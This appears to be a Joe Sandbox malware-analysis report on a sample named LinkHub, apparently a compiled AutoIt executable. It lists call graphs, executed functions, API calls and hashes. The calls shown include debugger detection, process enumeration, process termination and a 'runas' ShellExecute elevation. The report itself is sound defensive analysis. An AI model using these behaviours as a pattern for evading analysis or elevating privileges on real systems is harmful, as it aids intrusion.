API calls 98644->98646 98649 287ce6 CharUpperBuffW 98646->98649 98647 287c85 98830 20bd07 22 API calls 98647->98830 98651 287c3b 98648->98651 98653 287d00 98649->98653 98652 212b20 190 API calls 98651->98652 98652->98638 98654 287d53 98653->98654 98655 287d07 98653->98655 98656 208ec0 53 API calls 98654->98656 98659 27148b 22 API calls 98655->98659 98657 287d5b 98656->98657 98831 21aa65 23 API calls 98657->98831 98660 287d35 98659->98660 98661 212b20 190 API calls 98660->98661 98661->98638 98662 287d65 98662->98638 98663 208ec0 53 API calls 98662->98663 98664 287d80 98663->98664 98832 20bd07 22 API calls 98664->98832 98666->98566 98667->98540 98668->98549 98669->98553 98670->98568 98671->98568 98672->98581 98673->98581 98674->98581 98675->98575 98676->98581 98678 208ed5 98677->98678 98694 208ed2 98677->98694 98679 208f0b 98678->98679 98680 208edd 98678->98680 98682 208f1d 98679->98682 98687 246a38 98679->98687 98690 246b1f 98679->98690 98710 225536 26 API calls 98680->98710 98711 21fe6f 51 API calls 98682->98711 98683 208eed 98689 22014b 22 API calls 98683->98689 98686 246b37 98686->98686 98693 22017b 22 API calls 98687->98693 98699 246ab1 98687->98699 98691 208ef7 98689->98691 98713 2254f3 26 API calls 98690->98713 98692 20b329 22 API calls 98691->98692 98692->98694 98696 246a81 98693->98696 98700 26dd87 CreateToolhelp32Snapshot Process32FirstW 98694->98700 98695 22014b 22 API calls 98697 246aa8 98695->98697 98696->98695 98698 20b329 22 API calls 98697->98698 98698->98699 98712 21fe6f 51 API calls 98699->98712 98714 26e80e 98700->98714 98702 26de86 CloseHandle 98702->98598 98703 26ddd4 Process32NextW 98703->98702 98704 26ddcd 98703->98704 98704->98702 98704->98703 98705 20bf73 22 API calls 98704->98705 98706 20b329 22 API calls 98704->98706 98720 20568e 22 API calls 98704->98720 98721 207bb5 22 API calls 98704->98721 98722 21e36b 41 API calls 98704->98722 98705->98704 98706->98704 98710->98683 98711->98683 98712->98690 98713->98686 98715 26e819 98714->98715 98716 26e830 98715->98716 98719 26e836 98715->98719 98723 226722 GetStringTypeW 98715->98723 98724 22666b 39 API calls 98716->98724 98719->98704 98720->98704 98721->98704 98722->98704 98723->98715 98724->98719 98725->98607 98727 208ec0 53 API calls 98726->98727 98728 2889ed 98727->98728 98750 288a32 ISource 98728->98750 98764 289730 98728->98764 98730 288cde 98731 288eac 98730->98731 98735 288cec 98730->98735 98804 289941 60 API calls 98731->98804 98734 288ebb 98734->98735 98736 288ec7 98734->98736 98777 2888e3 98735->98777 98736->98750 98737 208ec0 53 API calls 98754 288aa6 98737->98754 98742 288d25 98792 21ffe0 98742->98792 98745 288d5f 98748 207e12 22 API calls 98745->98748 98746 288d45 98799 273fe1 82 API calls __wsopen_s 98746->98799 98751 288d6e 98748->98751 98749 288d50 GetCurrentProcess TerminateProcess 98749->98745 98750->98610 98752 208470 22 API calls 98751->98752 98753 288d87 98752->98753 98762 288daf 98753->98762 98800 211ca0 22 API calls 98753->98800 98754->98730 98754->98737 98754->98750 98797 264ad3 22 API calls __fread_nolock 98754->98797 98798 288f7a 42 API calls 98754->98798 98756 288f22 98756->98750 98760 288f36 FreeLibrary 98756->98760 98757 288d9e 98801 2895d8 75 API calls 98757->98801 98760->98750 98762->98756 98802 211ca0 22 API calls 98762->98802 98803 20b4c8 22 API calls 98762->98803 98805 2895d8 75 API calls 98762->98805 98765 20c2c9 22 API calls 98764->98765 98766 28974b CharLowerBuffW 98765->98766 98806 269805 98766->98806 98770 20bf73 22 API calls 98771 289787 98770->98771 98813 20acc0 22 API calls __fread_nolock 98771->98813 98773 28979b 98774 20adf4 22 API calls 98773->98774 98776 2897a5 _wcslen 98774->98776 98775 2898bb _wcslen 98775->98754 98776->98775 98814 288f7a 42 API calls 98776->98814 98778 288949 98777->98778 98779 2888fe 98777->98779 98783 289af3 98778->98783 98780 22017b 22 API calls 98779->98780 98781 288920 98780->98781 98781->98778 98782 22014b 22 API calls 98781->98782 98782->98781 98784 289d08 ISource 98783->98784 98791 289b17 _strcat _wcslen 98783->98791 98784->98742 98785 20c98d 39 API calls 98785->98791 98786 20ca5b 39 API calls 98786->98791 98787 20c63f 39 API calls 98787->98791 98788 22ed7c 21 API calls ___std_exception_copy 98788->98791 98789 208ec0 53 API calls 98789->98791 98791->98784 98791->98785 98791->98786 98791->98787 98791->98788 98791->98789 98817 26f8c5 24 API calls _wcslen 98791->98817 98793 21fff5 98792->98793 98794 22008d CreateToolhelp32Snapshot 98793->98794 98795 22007b CloseHandle 98793->98795 98796 22005b 98793->98796 98794->98796 98795->98796 98796->98745 98796->98746 98797->98754 98798->98754 98799->98749 98800->98757 98801->98762 98802->98762 98803->98762 98804->98734 98805->98762 98808 269825 _wcslen 98806->98808 98807 269914 98807->98770 98807->98776 98808->98807 98809 26985a 98808->98809 98812 269919 98808->98812 98809->98807 98815 21e36b 41 API calls 98809->98815 98812->98807 98816 21e36b 41 API calls 98812->98816 98813->98773 98814->98775 98815->98809 98816->98812 98817->98791 98818->98617 98819->98617 98820->98617 98822 286101 98821->98822 98827 28614f 98821->98827 98823 22017b 22 API calls 98822->98823 98825 286123 98823->98825 98824 22014b 22 API calls 98824->98825 98825->98824 98825->98827 98833 271400 22 API calls 98825->98833 98827->98636 98828->98638 98829->98647 98830->98638 98831->98662 98832->98638 98833->98825 98834 2115ff 98835 21e3d5 22 API calls 98834->98835 98836 211615 98835->98836 98841 21e439 98836->98841 98838 21163f 98853 273fe1 82 API calls __wsopen_s 98838->98853 98840 256207 98842 207ad5 22 API calls 98841->98842 98843 21e470 98842->98843 98844 20b329 22 API calls 98843->98844 98847 21e4a1 98843->98847 98845 25e53e 98844->98845 98854 207bb5 22 API calls 98845->98854 98847->98838 98848 25e549 98855 21e7c1 40 API calls 98848->98855 98850 25e55c 98852 25e560 98850->98852 98856 20b4c8 22 API calls 98850->98856 98852->98852 98853->98840 98854->98848 98855->98850 98856->98852

                                                                                        Executed Functions

                                                                                        Function 00205FC8 Relevance: 21.2, APIs: 9, Strings: 3, Instructions: 236libraryloaderCOMMON
                                                                                        Download Yara Rule

                                                                                        Control-flow Graph

                                                                                        • Executed
                                                                                        • Not Executed
                                                                                        control_flow_graph 224 205fc8-206037 call 20bf73 GetVersionExW call 208577 229 24507d-245090 224->229 230 20603d 224->230 232 245091-245095 229->232 231 20603f-206041 230->231 233 206047-2060a6 call 20adf4 call 2055dc 231->233 234 2450bc 231->234 235 245097 232->235 236 245098-2450a4 232->236 248 245224-24522b 233->248 249 2060ac-2060ae 233->249 239 2450c3-2450cf 234->239 235->236 236->232 238 2450a6-2450a8 236->238 238->231 241 2450ae-2450b5 238->241 242 20611c-206136 GetCurrentProcess IsWow64Process 239->242 241->229 244 2450b7 241->244 246 206195-20619b 242->246 247 206138 242->247 244->234 250 20613e-20614a 246->250 247->250 253 24522d 248->253 254 24524b-24524e 248->254 251 245125-245138 249->251 252 2060b4-2060b7 249->252 255 206150-20615f LoadLibraryA 250->255 256 245269-24526d GetSystemInfo 250->256 260 245161-245163 251->260 261 24513a-245143 251->261 252->242 262 2060b9-2060f5 252->262 259 245233 253->259 263 245250-24525f 254->263 264 245239-245241 254->264 257 206161-20616f GetProcAddress 255->257 258 20619d-2061a7 GetSystemInfo 255->258 257->258 265 206171-206175 GetNativeSystemInfo 257->265 266 206177-206179 258->266 259->264 270 245165-24517a 260->270 271 245198-24519b 260->271 267 245145-24514b 261->267 268 245150-24515c 261->268 262->242 269 2060f7-2060fa 262->269 263->259 272 245261-245267 263->272 264->254 265->266 275 206182-206194 266->275 276 20617b-20617c FreeLibrary 266->276 267->242 268->242 277 2450d4-2450e4 269->277 278 206100-20610a 269->278 279 245187-245193 270->279 280 24517c-245182 270->280 273 2451d6-2451d9 271->273 274 24519d-2451b8 271->274 272->264 273->242 285 2451df-245206 273->285 281 2451c5-2451d1 274->281 282 2451ba-2451c0 274->282 276->275 283 2450e6-2450f2 277->283 284 2450f7-245101 277->284 278->239 286 206110-206116 278->286 279->242 280->242 281->242 282->242 283->242 287 245114-245120 284->287 288 245103-24510f 284->288 289 245213-24521f 285->289 290 245208-24520e 285->290 286->242 287->242 288->242 289->242 290->242
                                                                                        APIs
                                                                                        • GetVersionExW.KERNEL32(?), ref: 00205FF7
                                                                                          • Part of subcall function 00208577: _wcslen.LIBCMT ref: 0020858A
                                                                                        • GetCurrentProcess.KERNEL32(?,0029DC2C,00000000,?,?), ref: 00206123
                                                                                        • IsWow64Process.KERNEL32(00000000,?,?), ref: 0020612A
                                                                                        • LoadLibraryA.KERNEL32(kernel32.dll,?,?), ref: 00206155
                                                                                        • GetProcAddress.KERNEL32(00000000,GetNativeSystemInfo), ref: 00206167
                                                                                        • GetNativeSystemInfo.KERNELBASE(?,?,?), ref: 00206175
                                                                                        • FreeLibrary.KERNEL32(00000000,?,?), ref: 0020617C
                                                                                        • GetSystemInfo.KERNEL32(?,?,?), ref: 002061A1
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000024.00000002.2112868306.0000000000201000.00000020.00000001.01000000.00000012.sdmp, Offset: 00200000, based on PE: true
                                                                                        • Associated: 00000024.00000002.2112846436.0000000000200000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2112924055.000000000029D000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2112924055.00000000002C3000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2112980189.00000000002CD000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2113005251.00000000002D5000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_36_2_200000_LinkHub.jbxd
                                                                                        Similarity
                                                                                        • API ID: InfoLibraryProcessSystem$AddressCurrentFreeLoadNativeProcVersionWow64_wcslen
                                                                                        • String ID: GetNativeSystemInfo$kernel32.dll$|O
                                                                                        • API String ID: 3290436268-3101561225
                                                                                        • Opcode ID: bc11a7fea0a82dd14580b0e9f82abedba1b321b847d72d834251e12182ff548f
                                                                                        • Instruction ID: bddf1da329d6c5816ffbe709b5beef9c5c9ac0f14e7a2e7e37d219668a08b3c5
                                                                                        • Opcode Fuzzy Hash: bc11a7fea0a82dd14580b0e9f82abedba1b321b847d72d834251e12182ff548f
                                                                                        • Instruction Fuzzy Hash: 64A16E32C2B3D4CBC796CB68BC4D1957FA46B36300B0868DBE48597263C2694DACDB71
                                                                                        Function 0020338B Relevance: 21.1, APIs: 8, Strings: 4, Instructions: 148windowCOMMON
                                                                                        Download Yara Rule

                                                                                        Control-flow Graph

                                                                                        APIs
                                                                                        • GetCurrentDirectoryW.KERNEL32(00007FFF,?,?,?,?,?,00203368,?), ref: 002033BB
                                                                                        • IsDebuggerPresent.KERNEL32(?,?,?,?,?,?,00203368,?), ref: 002033CE
                                                                                        • GetFullPathNameW.KERNEL32(00007FFF,?,?,002D2418,002D2400,?,?,?,?,?,?,00203368,?), ref: 0020343A
                                                                                          • Part of subcall function 00208577: _wcslen.LIBCMT ref: 0020858A
                                                                                          • Part of subcall function 0020425F: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,00203462,002D2418,?,?,?,?,?,?,?,00203368,?), ref: 002042A0
                                                                                        • SetCurrentDirectoryW.KERNEL32(?,00000001,002D2418,?,?,?,?,?,?,?,00203368,?), ref: 002034BB
                                                                                        • MessageBoxA.USER32(00000000,It is a violation of the AutoIt EULA to attempt to reverse engineer this program.,AutoIt,00000010), ref: 00243CB0
                                                                                        • SetCurrentDirectoryW.KERNEL32(?,002D2418,?,?,?,?,?,?,?,00203368,?), ref: 00243CF1
                                                                                        • GetForegroundWindow.USER32(runas,?,?,?,00000001,?,002C31F4,002D2418,?,?,?,?,?,?,?,00203368), ref: 00243D7A
                                                                                        • ShellExecuteW.SHELL32(00000000,?,?), ref: 00243D81
                                                                                          • Part of subcall function 002034D3: GetSysColorBrush.USER32(0000000F), ref: 002034DE
                                                                                          • Part of subcall function 002034D3: LoadCursorW.USER32(00000000,00007F00), ref: 002034ED
                                                                                          • Part of subcall function 002034D3: LoadIconW.USER32(00000063), ref: 00203503
                                                                                          • Part of subcall function 002034D3: LoadIconW.USER32(000000A4), ref: 00203515
                                                                                          • Part of subcall function 002034D3: LoadIconW.USER32(000000A2), ref: 00203527
                                                                                          • Part of subcall function 002034D3: LoadImageW.USER32(00000063,00000001,00000010,00000010,00000000), ref: 0020353F
                                                                                          • Part of subcall function 002034D3: RegisterClassExW.USER32(?), ref: 00203590
                                                                                          • Part of subcall function 002035B3: CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 002035E1
                                                                                          • Part of subcall function 002035B3: CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 00203602
                                                                                          • Part of subcall function 002035B3: ShowWindow.USER32(00000000,?,?,?,?,?,?,00203368,?), ref: 00203616
                                                                                          • Part of subcall function 002035B3: ShowWindow.USER32(00000000,?,?,?,?,?,?,00203368,?), ref: 0020361F
                                                                                          • Part of subcall function 0020396B: Shell_NotifyIconW.SHELL32(00000000,?), ref: 00203A3C
                                                                                        Strings
                                                                                        • It is a violation of the AutoIt EULA to attempt to reverse engineer this program., xrefs: 00243CAA
                                                                                        • AutoIt, xrefs: 00243CA5
                                                                                        • runas, xrefs: 00243D75
                                                                                        • 0$-, xrefs: 00203495
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000024.00000002.2112868306.0000000000201000.00000020.00000001.01000000.00000012.sdmp, Offset: 00200000, based on PE: true
                                                                                        • Associated: 00000024.00000002.2112846436.0000000000200000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2112924055.000000000029D000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2112924055.00000000002C3000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2112980189.00000000002CD000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2113005251.00000000002D5000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_36_2_200000_LinkHub.jbxd
                                                                                        Similarity
                                                                                        • API ID: LoadWindow$Icon$CurrentDirectory$CreateFullNamePathShow$BrushClassColorCursorDebuggerExecuteForegroundImageMessageNotifyPresentRegisterShellShell__wcslen
                                                                                        • String ID: 0$-$AutoIt$It is a violation of the AutoIt EULA to attempt to reverse engineer this program.$runas
                                                                                        • API String ID: 683915450-2053971045
                                                                                        • Opcode ID: 16d29208b96f05c7ab15de17b19f1ab14310fc7e32a64d87837c034b0fac2848
                                                                                        • Instruction ID: d15156df4eb07e4732490fb64dcea027c8ce37349a1d58584797dcbc24ae040b
                                                                                        • Opcode Fuzzy Hash: 16d29208b96f05c7ab15de17b19f1ab14310fc7e32a64d87837c034b0fac2848
                                                                                        • Instruction Fuzzy Hash: B851F170528341EEC716EF60ED09DAE7BB8AFA5744F00052EF581561E3CB608A6DDB62
                                                                                        Function 0026DD87 Relevance: 6.1, APIs: 4, Instructions: 86processCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • CreateToolhelp32Snapshot.KERNEL32 ref: 0026DDAC
                                                                                        • Process32FirstW.KERNEL32(00000000,?), ref: 0026DDBA
                                                                                        • Process32NextW.KERNEL32(00000000,?), ref: 0026DDDA
                                                                                        • CloseHandle.KERNELBASE(00000000), ref: 0026DE87
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000024.00000002.2112868306.0000000000201000.00000020.00000001.01000000.00000012.sdmp, Offset: 00200000, based on PE: true
                                                                                        • Associated: 00000024.00000002.2112846436.0000000000200000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2112924055.000000000029D000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2112924055.00000000002C3000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2112980189.00000000002CD000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2113005251.00000000002D5000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_36_2_200000_LinkHub.jbxd
                                                                                        Similarity
                                                                                        • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
                                                                                        • String ID:
                                                                                        • API String ID: 420147892-0
                                                                                        • Opcode ID: e69f51040576aea5bc98e54a6bbdd131d9995bbf72551904e17faba068236e17
                                                                                        • Instruction ID: 929da2ec6de936b1a97d6052f8ea49267138909e1bf9e3950c07f81a8b65c2e0
                                                                                        • Opcode Fuzzy Hash: e69f51040576aea5bc98e54a6bbdd131d9995bbf72551904e17faba068236e17
                                                                                        • Instruction Fuzzy Hash: 6C31D4725183019FC311EF50DC85AAFBBE8EF99340F10092DF585871A2DB729995CF92
                                                                                        Function 00225058 Relevance: 4.5, APIs: 3, Instructions: 20COMMONLIBRARYCODE
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • GetCurrentProcess.KERNEL32(00000003,?,0022502E,00000003,002C98D8,0000000C,00225185,00000003,00000002,00000000,?,00232C59,00000003), ref: 00225079
                                                                                        • TerminateProcess.KERNEL32(00000000,?,0022502E,00000003,002C98D8,0000000C,00225185,00000003,00000002,00000000,?,00232C59,00000003), ref: 00225080
                                                                                        • ExitProcess.KERNEL32 ref: 00225092
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000024.00000002.2112868306.0000000000201000.00000020.00000001.01000000.00000012.sdmp, Offset: 00200000, based on PE: true
                                                                                        • Associated: 00000024.00000002.2112846436.0000000000200000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2112924055.000000000029D000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2112924055.00000000002C3000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2112980189.00000000002CD000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2113005251.00000000002D5000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_36_2_200000_LinkHub.jbxd
                                                                                        Similarity
                                                                                        • API ID: Process$CurrentExitTerminate
                                                                                        • String ID:
                                                                                        • API String ID: 1703294689-0
                                                                                        • Opcode ID: 4cfb803fd5a347e33007708cb062ea84775ccbee428a891d13ddfc431a9550eb
                                                                                        • Instruction ID: 30ee21f8a16283566b9aa49c79ca7d223180dae4d2cb663bec827168eeb4bf4c
                                                                                        • Opcode Fuzzy Hash: 4cfb803fd5a347e33007708cb062ea84775ccbee428a891d13ddfc431a9550eb
                                                                                        • Instruction Fuzzy Hash: C3E04632010528AFCF216FA0ED0CE483B69EB14382F008014F8098A121DB3ADE62DEC0
                                                                                        Function 0021AC3E Relevance: 37.4, APIs: 1, Strings: 20, Instructions: 671COMMON
                                                                                        Download Yara Rule

                                                                                        Control-flow Graph

                                                                                        • Executed
                                                                                        • Not Executed
                                                                                        control_flow_graph 0 21ac3e-21b063 call 208ec0 call 21bc58 call 20e6a0 7 258584-258591 0->7 8 21b069-21b073 0->8 11 258596-2585a5 7->11 12 258593 7->12 9 21b079-21b07e 8->9 10 25896b-258979 8->10 13 21b084-21b090 call 21b5b6 9->13 14 2585b2-2585b4 9->14 17 25897e 10->17 18 25897b 10->18 15 2585a7 11->15 16 2585aa 11->16 12->11 22 2585bd 13->22 25 21b096-21b0a3 call 20c98d 13->25 14->22 15->16 16->14 20 258985-25898e 17->20 18->17 23 258990 20->23 24 258993 20->24 26 2585c7 22->26 23->24 27 25899c-2589eb call 20e6a0 call 21bbbe * 2 24->27 33 21b0ab-21b0b4 25->33 31 2585cf-2585d2 26->31 62 21b1e0-21b1f5 27->62 63 2589f1-258a03 call 21b5b6 27->63 34 21b158-21b16f 31->34 35 2585d8-258600 call 224cd3 call 207ad5 31->35 37 21b0b8-21b0d6 call 224d98 33->37 40 258954-258957 34->40 41 21b175 34->41 75 258602-258606 35->75 76 25862d-258651 call 207b1a call 20bd98 35->76 56 21b0e5 37->56 57 21b0d8-21b0e1 37->57 45 258a41-258a79 call 20e6a0 call 21bbbe 40->45 46 25895d-258960 40->46 47 2588ff-258920 call 20e6a0 41->47 48 21b17b-21b17e 41->48 45->62 106 258a7f-258a91 call 21b5b6 45->106 46->27 53 258962-258965 46->53 47->62 80 258926-258938 call 21b5b6 47->80 54 21b184-21b187 48->54 55 258729-258743 call 21bbbe 48->55 53->10 53->62 64 21b18d-21b190 54->64 65 2586ca-2586e0 call 206c03 54->65 85 25888f-2588b5 call 20e6a0 55->85 86 258749-25874c 55->86 56->26 68 21b0eb-21b0fc 56->68 57->37 66 21b0e3 57->66 70 21b1fb-21b20b call 20e6a0 62->70 71 258ac9-258acf 62->71 97 258a05-258a0d 63->97 98 258a2f-258a3c call 20c98d 63->98 78 258656-258659 64->78 79 21b196-21b1b8 call 20e6a0 64->79 65->62 95 2586e6-2586fc call 21b5b6 65->95 66->68 68->10 69 21b102-21b11c 68->69 69->31 82 21b122-21b154 call 21bbbe call 20e6a0 69->82 71->33 88 258ad5 71->88 75->76 90 258608-25862b call 20ad40 75->90 76->78 78->10 83 25865f-258674 call 206c03 78->83 79->62 114 21b1ba-21b1cc call 21b5b6 79->114 117 258945 80->117 118 25893a-258943 call 20c98d 80->118 82->34 83->62 136 25867a-258690 call 21b5b6 83->136 85->62 139 2588bb-2588cd call 21b5b6 85->139 104 2587bf-2587de call 20e6a0 86->104 105 25874e-258751 86->105 88->10 90->75 90->76 142 25870d-258716 call 208ec0 95->142 143 2586fe-25870b call 208ec0 95->143 112 258a0f-258a13 97->112 113 258a1e-258a29 call 20b4b1 97->113 149 258ac2-258ac4 98->149 104->62 141 2587e4-2587f6 call 21b5b6 104->141 120 258757-258774 call 20e6a0 105->120 121 258ada-258ae8 105->121 153 258ab5-258abe call 20c98d 106->153 154 258a93-258a9b 106->154 112->113 129 258a15-258a19 112->129 113->98 161 258b0b-258b19 113->161 162 21b1d2-21b1de 114->162 163 2586ba-2586c3 call 20c98d 114->163 135 258949-25894f 117->135 118->135 120->62 165 25877a-25878c call 21b5b6 120->165 127 258aed-258afd 121->127 128 258aea 121->128 144 258b02-258b06 127->144 145 258aff 127->145 128->127 146 258aa1-258aa3 129->146 135->62 178 258692-25869b call 20c98d 136->178 179 25869d-2586ab call 208ec0 136->179 169 2588cf-2588dc call 20c98d 139->169 170 2588de 139->170 141->62 185 2587fc-258805 call 21b5b6 141->185 186 258719-258724 call 208577 142->186 143->186 144->70 145->144 146->62 149->62 153->149 166 258a9d 154->166 167 258aa8-258ab3 call 20b4b1 154->167 175 258b1e-258b21 161->175 176 258b1b 161->176 162->62 163->65 197 25879f 165->197 198 25878e-25879d call 20c98d 165->198 166->146 167->153 167->161 184 2588e2-2588e9 169->184 170->184 175->20 176->175 204 2586ae-2586b5 178->204 179->204 191 2588f5 call 203907 184->191 192 2588eb-2588f0 call 20396b 184->192 210 258807-258816 call 20c98d 185->210 211 258818 185->211 186->62 209 2588fa 191->209 192->62 199 2587a3-2587ae call 229334 197->199 198->199 199->10 215 2587b4-2587ba 199->215 204->62 209->62 214 25881c-25883f 210->214 211->214 217 258841-258848 214->217 218 25884d-258850 214->218 215->62 217->218 219 258860-258863 218->219 220 258852-25885b 218->220 221 258865-25886e 219->221 222 258873-258876 219->222 220->219 221->222 222->62 223 25887c-25888a 222->223 223->62
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000024.00000002.2112868306.0000000000201000.00000020.00000001.01000000.00000012.sdmp, Offset: 00200000, based on PE: true
                                                                                        • Associated: 00000024.00000002.2112846436.0000000000200000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2112924055.000000000029D000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2112924055.00000000002C3000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2112980189.00000000002CD000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2113005251.00000000002D5000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_36_2_200000_LinkHub.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: 4)$@)$P)$`*-$`)$d0b$d10m0$d1b$d1r0,2$d5m0$e#-$i$t)$t)$(-$(-$(-$(-$)$)
                                                                                        • API String ID: 0-4211438255
                                                                                        • Opcode ID: 475a7e461b40839ccf66c6aecb99e8f25679317496fc2d51fb7bc68569c4a1a8
                                                                                        • Instruction ID: f8663a517c51ce60816e8d9153365ec51c3e76f18c6dd3381fef9a0bfd20b1b0
                                                                                        • Opcode Fuzzy Hash: 475a7e461b40839ccf66c6aecb99e8f25679317496fc2d51fb7bc68569c4a1a8
                                                                                        • Instruction Fuzzy Hash: A8625874528341DFC725CF14C094AAABBE1FF98304F10895EE8899B352DBB1D999CF92
                                                                                        Function 00203624 Relevance: 21.1, APIs: 7, Strings: 5, Instructions: 53windowregistryCOMMON
                                                                                        Download Yara Rule

                                                                                        Control-flow Graph

                                                                                        APIs
                                                                                        • GetSysColorBrush.USER32(0000000F), ref: 00203657
                                                                                        • RegisterClassExW.USER32(00000030), ref: 00203681
                                                                                        • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00203692
                                                                                        • InitCommonControlsEx.COMCTL32(?), ref: 002036AF
                                                                                        • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 002036BF
                                                                                        • LoadIconW.USER32(000000A9), ref: 002036D5
                                                                                        • ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 002036E4
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000024.00000002.2112868306.0000000000201000.00000020.00000001.01000000.00000012.sdmp, Offset: 00200000, based on PE: true
                                                                                        • Associated: 00000024.00000002.2112846436.0000000000200000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2112924055.000000000029D000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2112924055.00000000002C3000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2112980189.00000000002CD000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2113005251.00000000002D5000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_36_2_200000_LinkHub.jbxd
                                                                                        Similarity
                                                                                        • API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
                                                                                        • String ID: +$0$0+m" $AutoIt v3 GUI$TaskbarCreated
                                                                                        • API String ID: 2914291525-3995681352
                                                                                        • Opcode ID: 96f77cee26cc94e644cc8163b5dccb099bf445400262e999eecb80cfa10fda2a
                                                                                        • Instruction ID: c6d1065346aa3aa471ce7a0e70674e6a6bd3e11cbabbf8bd43bed7f11b2d5875
                                                                                        • Opcode Fuzzy Hash: 96f77cee26cc94e644cc8163b5dccb099bf445400262e999eecb80cfa10fda2a
                                                                                        • Instruction Fuzzy Hash: B721BFB5D12218EFDB009FA4F98DBDDBBB4FB18710F10411BEA11A62A0D7B549589F90
                                                                                        Function 0020370F Relevance: 19.4, APIs: 8, Strings: 3, Instructions: 145windowtimeregistryCOMMON
                                                                                        Download Yara Rule

                                                                                        Control-flow Graph

                                                                                        • Executed
                                                                                        • Not Executed
                                                                                        control_flow_graph 356 20370f-203724 357 203784-203786 356->357 358 203726-203729 356->358 357->358 359 203788 357->359 360 20378a 358->360 361 20372b-203732 358->361 362 20376f-203777 DefWindowProcW 359->362 363 243df4-243e1c call 202f92 call 21f23c 360->363 364 203790-203795 360->364 365 203804-20380c PostQuitMessage 361->365 366 203738-20373d 361->366 367 20377d-203783 362->367 402 243e21-243e28 363->402 369 203797-20379a 364->369 370 2037bc-2037e3 SetTimer RegisterWindowMessageW 364->370 368 2037b8-2037ba 365->368 371 203743-203747 366->371 372 243e61-243e75 call 26c8f7 366->372 368->367 374 2037a0-2037b3 KillTimer call 203907 call 2059ff 369->374 375 243d95-243d98 369->375 370->368 376 2037e5-2037f0 CreatePopupMenu 370->376 377 20374d-203752 371->377 378 20380e-20381d call 21fcad 371->378 372->368 397 243e7b 372->397 374->368 382 243dd0-243def MoveWindow 375->382 383 243d9a-243d9e 375->383 376->368 385 243e46-243e4d 377->385 386 203758-20375d 377->386 378->368 382->368 391 243da0-243da3 383->391 392 243dbf-243dcb SetFocus 383->392 385->362 394 243e53-243e5c call 261423 385->394 395 2037f2-203802 call 20381f 386->395 396 203763-203769 386->396 391->396 398 243da9-243dba call 202f92 391->398 392->368 394->362 395->368 396->362 396->402 397->362 398->368 402->362 403 243e2e-243e41 call 203907 call 20396b 402->403 403->362
                                                                                        APIs
                                                                                        • DefWindowProcW.USER32(?,?,?,?,?,?,?,?,?,00203709,?,?), ref: 00203777
                                                                                        • KillTimer.USER32(?,00000001,?,?,?,?,?,00203709,?,?), ref: 002037A3
